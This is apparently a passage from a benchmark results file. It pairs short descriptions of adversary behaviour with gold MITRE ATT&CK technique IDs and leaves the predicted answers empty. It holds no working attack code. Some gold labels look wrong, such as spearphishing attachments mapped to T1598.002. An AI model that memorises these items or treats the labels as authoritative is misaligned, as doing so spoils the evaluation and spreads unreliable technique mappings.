+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has functionality to copy itself to removable media.",
+ "gold": [
+ "T1091"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has gathered a process list by using .exe.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has gathered information about network IP configurations using .exe and about routing tables using .exe.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has has extensively used strategic Web compromises to target victims.",
+ "gold": [
+ "T1189"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has leveraged both Spearphishing Link and Spearphishing Attachment attempting to gain User Execution.",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has lured users to click links to malicious HTML applications delivered via spearphishing emails.",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has obfuscated a script with Crypto Obfuscator.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has run ipconfig /all on a victim.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has sent spearphishing emails links and attachments attempting to get a user to click.",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has sent spearphishing emails with attachments to victims as its primary initial access vector.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the \u201cattachedTemplate\u201d technique to load a template from a remote server.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has sent spearphising emails with malicious links to potential victims.",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has targeted manufacturers in the supply chain for the defense industry.",
+ "gold": [
+ "T1195"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the ability to enumerate files and drives.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the ability to obtain a victim's system name and operating system version.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the ability to remotely execute commands.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the ability to search for a given process name in processes currently running in the system.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to delete files.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to download files to execute on the victim\u2019s machine.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to execute the command net localgroup administrators.",
+ "gold": [
+ "T1069"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to gather the OS version and computer name.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to obtain the time zone information and current timestamp of the victim\u2019s machine.",
+ "gold": [
+ "T1124"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has the capability to upload and download files to the victim's machine.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Mozilla password manager, Google Chrome password manager, Outlook, Internet Explorer, and Windows Credential Store.",
+ "gold": [
+ "T1552.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"has used a VBScript named \"\"ggldr\"\" that uses Google Apps Script, Sheets, and Forms services for C2.\"",
+ "gold": [
+ "T1102"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used both HTTP and HTTPS for C2.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used CHM files to move concealed payloads as part of.",
+ "gold": [
+ "T1218.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used command-line interfaces for execution.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used CVE-2016-7255 to escalate privileges.",
+ "gold": [
+ "T1068"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as .",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used FTP to exfiltrate collected data.",
+ "gold": [
+ "T1048"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used HTTP and HTTPS for C2 communications.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.",
+ "gold": [
+ "T1547.001",
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used net user to conduct internal discovery of systems.",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used net use to conduct connectivity checks to machines.",
+ "gold": [
+ "T1049"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used PowerShell Empire.",
+ "gold": [
+ "T1059.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used RAR to compress, encrypt, and password-protect files prior to exfiltration.",
+ "gold": [
+ "T1486",
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used RAR to compress files before moving them outside of the victim network.",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used Registry keys to detect and avoid executing in potential sandboxes.",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used remote code execution to download subsequent payloads.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used rundll32.exe in a Registry value to establish persistence.",
+ "gold": [
+ "T1218.011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used scheduled task raw XML with a backdated timestamp of June 2, 2016.",
+ "gold": [
+ "T1070.006"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used spearphishing with links to deliver files with exploits to initial victims. The group has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
